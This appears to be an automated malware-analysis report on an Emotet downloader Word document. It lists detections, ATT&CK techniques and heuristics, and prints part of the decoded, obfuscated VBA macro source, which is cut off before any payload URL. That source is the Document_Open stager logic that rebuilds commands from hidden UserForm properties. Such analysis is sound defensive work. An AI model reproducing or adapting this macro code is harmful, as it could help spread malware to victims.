MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros, specifically a Document_Open macro designed to execute code automatically upon opening. Heuristics indicate a command stager utilizing CreateObject and hidden UserForm properties, a common Emotet technique. ClamAV detection confirms this as Doc.Downloader.Emotet-7464331-0, strongly suggesting its role as a downloader for further malicious payloads.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7464331-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464331-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10557 bytes |
SHA-256: 0b489ba56aa48d0edc2d7239999080a52b4fe152ee53e55084b52adfc1c39c15 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Vzacetxliu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Fcmoftnsm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Znhldvghbbxua
Case Rtpvvvcy
Tctgqelwjs = Sin(Aakpmlus)
Xyxsfpybxor = CStr(Snbkxmxrvc)
Okfirdypffui = 324
Vyhumkyqsclax = Sin(Vbwhzrftsgktm)
Sslyrzjapfu = CStr(Cxqgstjdybzh)
Pnbrlleks = 567
Nwmbgbetmruqe = Sin(Ujurmqbvunoo)
Nsebhfwxcr = CStr(Odnuxxqsrvpb)
Mbrosmvgy = 5645
End Select
For Oxvxwhcrscy = Pqxqvsccyysvg To Myheoeiavvunn
While Fotsybpflg <> Pycbqsdftut
Gqcvbeptosec = Wxtvyrqsbtt * Atn(Jeqkuzwrlmjk) * (Ubfxzcdgh + Vcenpicxkfpxh)
Wend
Next
Select Case Drxpyylwb
Case Mlfrnoskqiue
Gwuhxkzpm = Sin(Fjgjgrwfdca)
Mkhvtyimj = CStr(Cqpestxyscif)
Jryykggu = 324
Ncevnecvbohp = Sin(Njebjfeevukh)
Yblieuqqobl = CStr(Mdwttofkabelh)
Gklgunwady = 567
Bxvcqufra = Sin(Qsedyzhw)
Ijeqeump = CStr(Uigenfynqbzh)
Voqjyavcof = 5645
End Select
For Qmmatbxefil = Sbtgudacvvq To Rcystblz
While Bqiykcdncq <> Zbvubslvr
Qjugmojnqcprq = Qarinmild * Atn(Zasotuftropvq) * (Dcdjkfiwclej + Hyrkqpjuci)
Wend
Next
Select Case Jjhxbobjee
Case Djwddzoe
Zxepjrvg = Sin(Hzfecdad)
Gwcmdelzvphg = CStr(Jktlejoxo)
Desazykggwcu = 324
Egvlzvblzu = Sin(Pyodjidszz)
Vrwzgjhqbzacs = CStr(Essfyipilsd)
Rzmenwpiybeq = 567
Ipylkxty = Sin(Uvqgikhdw)
Cmvpwxggrnplg = CStr(Ngsqaszfksgi)
Tbtydfddwoz = 5645
End Select
For Jufjjypxalgm = Glxpohsx To Mdbpjkeqozpl
While Xkjptpnlwc <> Zyleamikwfwz
Gpygnvgordx = Whbgzsrk * Atn(Jzdctmrnk) * (Jynppbll + Hyhmdvyxg)
Wend
Next
Hfekjimal
End Sub
Attribute VB_Name = "Mwtqbkvasc"
Attribute VB_Base = "0{BF7CDED4-24D1-4D3C-88BC-FE9F49D87F39}{49AF0327-84FA-4937-9D9F-628CD34DFD79}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Okptjwhtrco"
Function Rnrfvwlgkp()
Select Case Gidprvjmbomr
Case Mbsgbyaqjacuy
Kfkokhdcykbbu = Sin(Jlzwbildgsrq)
Mxxqoqjc = CStr(Sjyuwawfqorq)
Qpycewsr = 324
Lndkgimhidesk = Sin(Fvmzklvbv)
Sgygcbeyijwlz = CStr(Khrxyehv)
Grunqlhk = 567
Ficbdnlixjj = Sin(Ibnkxbuklzfw)
Ksxpbsrwbf = CStr(Ksyxprtzmmca)
Mgtjwetdbq = 5645
End Select
For Iualahudqblo = Dkxypxfrgkc To Lbgrixviyy
While Ufgskufyhb <> Dacoropji
Cjkdqogelw = Ryyvqwtbjrao * Atn(Grkirdwwejar) * (Bxxjqflqss + Owakjwvwio)
Wend
Next
Kputbqlgts = Vzacetxliu.Fcmoftnsm
Select Case Wcaekgsvnf
Case Whgqfgxvyug
Mvrwhlzjzsfzi = Sin(Zyiphlmwanc)
Jlbvnfyka = CStr(Tagxpaqxa)
Zmrfnazqientz = 324
Kmchezybvhe = Sin(Zxfyxnlpd)
Yljqbghhjzqe = CStr(Dwbkwyjlsrlz)
Ldagekjtpizo = 567
Fhjtkgurjfhki = Sin(Secslwgykaji)
Skhymflis = CStr(Bttvytbwb)
Xwoaziyt = 5645
End Select
For Kkruzlwhgklnj = Mdlghmij To Kklgcjznlq
While Byifouns <> Dxmfnmtkcad
Bkbebmzyusl = Xcynwwcxgo * Atn(Vmuanjytjgump) * (Koifbdbpr + Dgfruwihgzf)
Wend
Next
Poobtwyapf = Kputbqlgts + Mwtqbkvasc.Hscfpvmyrfzt + Mwtqbkvasc.Dyufgqoks + Mwtqbkvasc.Rwozwyvkv
Select Case Naakpkout
Case Ittsapta
Nhbpaalp = Sin(Isaputzp)
Vmfjkdtlyfgt = CStr(Atyvpkceb)
Pseygpdbvfab = 324
Xhaqmwpsu = Sin(Veaosqkd)
Kpmspcrdbzrg = CStr(Cbopedxypxll)
Doqydkmrnyw = 567
Ospjonilqcvyl = Sin(Apgdydamjt)
Floptkfif = CStr(Wyvbnmuzsnz)
Rsvvogfqmicac = 5645
End Select
For Ogohackf = Naoukrft To Aojuyuxkpsbkz
While Lzsrvhmrta <> Vbqwhmobzwt
Eaqkacavj = Mcuqowqtsdbi * Atn(Uykrlpgklrhwh) * (Fvmcyjeryncfz + Crqogdqe)
Wend
Next
Rjdnzieqchyp = Poobtwy
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.